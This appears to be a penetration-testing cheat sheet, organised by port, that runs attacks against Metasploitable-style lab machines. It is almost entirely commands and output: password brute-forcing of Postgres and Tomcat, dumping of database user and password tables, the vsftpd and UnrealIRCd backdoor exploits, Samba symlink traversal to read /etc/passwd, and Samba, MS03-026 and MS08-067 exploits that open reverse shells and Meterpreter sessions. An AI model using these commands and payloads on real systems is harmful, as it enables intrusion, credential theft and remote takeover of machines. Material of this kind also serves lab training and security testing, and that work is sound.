[-] Remote-IP-Address:5432 Postgres - [09/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [10/21] - Trying username:'' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'postgres'
[-] Remote-IP-Address:5432 Postgres - [10/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [11/21] - Trying username:'' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'
[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'
[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'
[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'
[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'
[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'
[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'
[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'
[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) >
root@bt:~# psql -h Remote-IP-Address -U postgres -W
Password for user postgres: postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=#
----------------------------------------------------------------------------------
port 25 - smtp
root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address
Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT
Nmap scan report for IP-Address
Host is up (0.00082s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
465/tcp closed smtps
587/tcp closed submission
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)
----------------------------------------------------------------------------------
port 3306 - mysql (linux)
root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address
Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT
Nmap scan report for External-IP-Address
Host is up (0.00053s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
|_ root account has empty password
MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 13
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.01 sec)
mysql> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.01 sec)
mysql> SELECT * FROM users;
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://IP-Address/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://IP-Address/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://IP-Address/dvwa/hackable/users/smithy.jpg |
+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+
5 rows in set (0.00 sec)
mysql>
mysql>
mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.00 sec)
mysql> SELECT * FROM accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password | mysignature | is_admin |
+-----+----------+--------------+-----------------------------+----------+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.18 sec)
mysql>
----------------------------------------------------------------------------------
port 21 - FTP (linux)
root@bt:~# nmap -sC -sT -v IP-Address
PORT STATE SERVICE
21/tcp open ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
------------------------------------------------
msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set rhosts IP-Address
msf auxiliary(ftp_version) > run
[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
------------------------------------------------
msf auxiliary(ftp_version) > search vsFTPd
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution
------------------------------------------------
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set rhost IP-Address
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000
ls -l
drwxr-xr-x 2 root root 4096 May 13 1421 bin
drwxr-xr-x 4 root root 1024 May 13 1421 boot
lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev
drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc
drwxr-xr-x 6 root root 4096 Apr 16 1421 home
port 6667 - Unreal ircd (win/linux)
root@bt:~# nmap -sV -sC -v -p 6667 IP-Address
6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.20:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100
----------------------------------------------------------------------------------
port 1524 - ingreslock (linux)
1524/tcp open ingreslock?
The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:
root@bt# telnet 192.168.1.20 1524
Trying 192.168.1.20...
Connected to 192.168.1.20.
Escape character is '^]'.
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------------------------
port 8180 - tomcat_mgr_login (win/linux)
msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8180
msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address
msf auxiliary(tomcat_mgr_login) > run
[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'
[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
----------------------------------------------------------------------------------
port 139 - (linux)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.99.131\tmp\rootfs\
msf auxiliary(samba_symlink_traversal) > exit
root@bt:# smbclient //Remote-IP-Address1/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]
----------------------------------------------------------------------------------
port 139/445 - (linux)
samba "username map script" command execution
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set rhost Remote-IP-Addres
msf exploit(usermap_script) > set lhost Local-IP-Address
msf exploit(usermap_script) > set rport 139 or 445 (both will work)
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AGo0tmuVPzZXPNPw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "AGo0tmuVPzZXPNPw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100
----------------------------------------------------------------------------------
port 445 - (linux)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] Connecting to the server...
[*] Trying to mount writeable share 'tmp'...
[*] Trying to link 'rootfs' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\192.168.99.131\tmp\rootfs\
msf auxiliary(samba_symlink_traversal) > exit
root@bt:# smbclient //Remote-IP-Address1/tmp
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd
getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[..]
----------------------------------------------------------------------------------
port 135 - msrpc (win)
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set lhost IP-Address
msf exploit(ms03_026_dcom) > set rhost IP-Address
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on IP-Address:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Sending exploit ...
----------------------------------------------------------------------------------
port 445 - microsoft-ds (win)
use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit
[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)
Once done you need to open the console by typing the bellow after the >
meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.
myexploit.wordpress.com/control-smb-445-137-139/
And local printer exploit
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck
hdm
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
